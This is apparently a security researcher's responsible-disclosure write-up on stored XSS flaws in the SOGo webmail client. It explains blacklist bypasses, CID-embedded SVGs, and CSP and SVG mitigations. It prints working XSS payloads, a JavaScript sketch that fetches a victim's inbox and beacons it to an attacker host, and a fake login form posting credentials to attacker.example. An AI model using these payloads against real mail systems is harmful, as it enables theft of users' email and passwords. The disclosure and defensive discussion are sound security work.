In my spare time I like to search for vulnerabilities in web applications as part of various vulnerability disclosure programs (VDPs). One program I had been working on introduced me to the SOGo webmail client. Inverse, who maintain SOGo along with a community of developers, describe it as “a fully supported and trusted groupware server with a focus on scalability and open standards”. It offers more than just webmail, but that is what we are focusing on in this article. SOGo is open source and is used by some large companies and organisations, one of which brought the application to my attention through its VDP.
I cannot disclose the details of the program, but I did find several vulnerabilities, one of which was critical. Unfortunately the webmail client was deemed out of scope for the VDP. The issues were raised with Inverse and fixed promptly but I chose to part ways with the VDP.
Following successful remedial work by Inverse, I decided to read some of the source code, starting with the fixes that had been made; it was open source, after all. I was no longer working on the original VDP, so instead I used an instance of SOGo managed by Gandi, a domain name registrar, hosting and email provider.
The SOGo webmail client is written in Objective-C, a language I have no experience with. That aside, I found the file that had been amended as part of the fix and started reading. It quickly became apparent that there could be further issues with payloads similar to the one I had used previously.
<img src onerror='alert()'/>
With the knowledge of the approach being used, I began to research HTML events, learning about obscure ones I had never used or come across before. Then it was a case of comparing these against the blacklist in the SOGo code. It didn’t take long to find event handlers that were not present.
<svg> <animate attributename="x" dur="1s" onbegin="alert()"> </animate> </svg>
I successfully modified the script so that it could read and delete emails from the inbox, and send data out to an external server. In the image below you can see two emails in the victim’s inbox. One is benign and the other contains a malicious payload.
After opening the malicious email, the contents of the other email in the inbox are sent to the attacker’s server. The image below shows the content captured by the attacker (the email subject is highlighted in yellow).
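To make the mechanics concrete, here is a rough sketch of what a payload along these lines might do once it executes in the victim’s session. The inbox endpoint path and the attacker’s hostname below are invented for illustration, not SOGo’s real API; only the overall shape (a same-origin fetch riding on the session cookie, followed by an image beacon to the attacker) reflects the attack described above.

```javascript
// Illustrative sketch only. The endpoint path is made up; the technique is what matters.
function beaconUrl(attackerHost, data) {
  // Smuggle (truncated) data out as a query string on an image request.
  return "https://" + attackerHost + "/c?d=" + encodeURIComponent(data.slice(0, 2000));
}

async function exfiltrateInbox(attackerHost) {
  // A same-origin request automatically carries the victim's session cookie.
  const res = await fetch("/SOGo/so/victim/Mail/0/folderINBOX/view"); // hypothetical path
  const body = await res.text();
  // Image requests are a classic exfiltration channel: no CORS preflight, fire-and-forget.
  new Image().src = beaconUrl(attackerHost, body);
}
```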
With the impact of the vulnerability determined, I contacted Gandi, whose instance of SOGo I had been experimenting on. They had information at /.well-known/security.txt (a reserved address for security-related information) which allowed me to contact the right people quickly. Within a few hours I had provided all of the information on the issue and a dialogue had been opened. Gandi agreed to contact Inverse to raise the vulnerability with them.
While open source code is great for many reasons, there is a downside which in this instance is all too clear. The open nature of the code meant that I was able to find the vulnerability not through mass trial and error, but through targeted attempts based on my understanding of what the application was doing. Arguably, this makes the code easier to attack. That is not to say that open source code is less secure, merely that if vulnerabilities are there, they can be easier to find than in closed software. It is also often the case that vulnerabilities are found and fixed more swiftly in open source than in closed source software. What is important, if you are using any kind of third-party code or software, is that you evaluate it yourself and always keep it up to date. With open source, it is harder to announce security vulnerabilities without giving attackers precise ammunition against users still on older versions, because the fix is there for all to see, and often the fix will reveal the attack vector.
As it turns out, the fix (fix #1) that SOGo implemented almost caught this: an almost identical “else if” has since been added, this time with the correct casing, and now all attributes beginning with “on” are blocked.
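The difference between the two filtering strategies can be sketched in a few lines. This is not SOGo’s actual code (which is Objective-C); the function names and blacklist contents here are invented, purely to illustrate why an exact-match blacklist misses obscure handlers while a prefix check does not.

```javascript
// Hypothetical exact-match blacklist, as in the original filtering approach.
const blacklist = ["onclick", "onerror", "onload", "onmouseover"];

function blockedByBlacklist(attr) {
  return blacklist.includes(attr.toLowerCase());
}

// The eventual approach described above: reject anything beginning with "on".
function blockedByPrefix(attr) {
  return attr.toLowerCase().startsWith("on");
}

console.log(blockedByBlacklist("onbegin")); // false: slips past the blacklist
console.log(blockedByPrefix("onbegin"));    // true: caught by the prefix rule
```

The prefix rule works because every HTML event handler attribute starts with “on”, so there is nothing for an obscure handler to hide behind.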
The login form acts as a keylogger and sends the victim’s username and password to the attacker’s server, then sends the user back to the inbox, none the wiser.
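As an illustration of how little an attacker needs for this, a fake login form can be as simple as the following. The action URL and field names are invented for this example; a real payload would style the form to match SOGo’s login page.

```html
<!-- Illustrative only: a fake login form injected via XSS.
     Submitting sends the credentials straight to the attacker. -->
<form action="https://attacker.example/steal" method="POST">
  <input name="username" placeholder="Email">
  <input name="password" type="password" placeholder="Password">
  <button type="submit">Sign in</button>
</form>
```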
At this point it is worth mentioning the CSP header, as touched on earlier. A Content Security Policy (CSP) is a way of telling the browser what resources your website is allowed to request, and these days it is a very useful tool for preventing XSS. In the examples given here, a CSP would likely have prevented the XSS vulnerabilities from being usable, or at the very least made exploitation a lot harder. For example, if the CSP prevented the attacker’s server from being called, there would be no way of exfiltrating the data off the webmail client. Yes, there would still be an XSS hole, but it would be defused. That said, CSP should not be relied upon alone, and systems should still be regularly tested for XSS vulnerabilities. But in instances where vulnerabilities are introduced, CSP can be a very useful safety net.
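As an illustration, a policy along these lines (not SOGo’s actual configuration) would stop the payloads shown here from reaching an attacker-controlled host, because scripts, images and fetch/XHR requests would all be restricted to the site’s own origin, and inline event handlers would be refused outright:

```
Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'; connect-src 'self'
```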
As is normal with vulnerability disclosure, I needed to wait a period of time before I could publish this article. During that time I occasionally dipped back into looking for further exploits. During my original investigations I became aware that if I could determine the ID of a malicious email that had been sent, I would be able to embed a malicious SVG and have it execute via an embed tag. This was because attachments are served on the same domain and have a predictable URL (which includes the email ID, an integer). Requests to the SVG would send along the relevant auth cookie and allow script to be run in the victim’s context (another XSS attack). However, without being able to run any script from the email body, I was at a loss as to how I could predetermine the URL of the malicious attachment I was sending. But looking at the code again, I realised that I didn’t need to know the full URL, thanks to the way SOGo handles images embedded in emails.
Within emails you can embed images in the body content in different ways. One way is using a Content-ID. This is where you attach a file as a regular attachment and then reference that attachment using a Content-ID.
<img src="cid:filename.jpg" />
The SOGo application code normally rewrites “src” attributes to “unsafe-src” to prevent them being rendered. However, there is a special clause which allows a “src” through if its value is a CID and a file with that name is attached. Suddenly, I didn’t need to know the full URL of the SVG on the server, just the filename (which the sender controls). I sent a test email with the following body content and it worked.
<embed type="image/svg+xml" src="cid:my-really-safe-file.svg"></embed>
It took a few tweaks to the payload I used in the first hack but then I was successfully sending the contents of other emails out to my external server again. All the victim had to do was open the email. I notified Inverse and a fix was applied shortly after (fix #5).
It is important to remember the threat SVGs can pose. If you allow an external actor to supply an SVG which is subsequently displayed to the user in a way that will execute embedded scripts, mitigations need to be put in place. There are numerous ways of dealing with this which are beyond the scope of this article. If in doubt, block external SVGs.
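For anyone unfamiliar with why SVGs are a risk: SVG is an XML format and may legitimately contain script, so rendering an untrusted SVG inline, or via embed or object tags (rather than via an img tag, which does not execute scripts), runs that script in your origin. A minimal example:

```html
<!-- If this file is rendered via <embed> or <object> on the same origin,
     the script executes with access to that origin's cookies and DOM. -->
<svg xmlns="http://www.w3.org/2000/svg">
  <script>alert(document.cookie)</script>
</svg>
```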
During the course of my experiments, I always acted on my own Gandi mailbox and did not attempt to access the data of any other user. Both Gandi and Inverse reacted quickly when these issues were brought to their attention. I notified both companies of the intention to publish this article and allowed 90 days from reporting the last critical issue before doing so. This was to allow time to fix vulnerabilities, roll out releases and for consumers to upgrade their instances of SOGo.
For a full demonstration of the XSS vulnerabilities discussed in this article, watch the video below.
For a demonstration of stealing credentials by hijacking the email buttons, watch the second video below.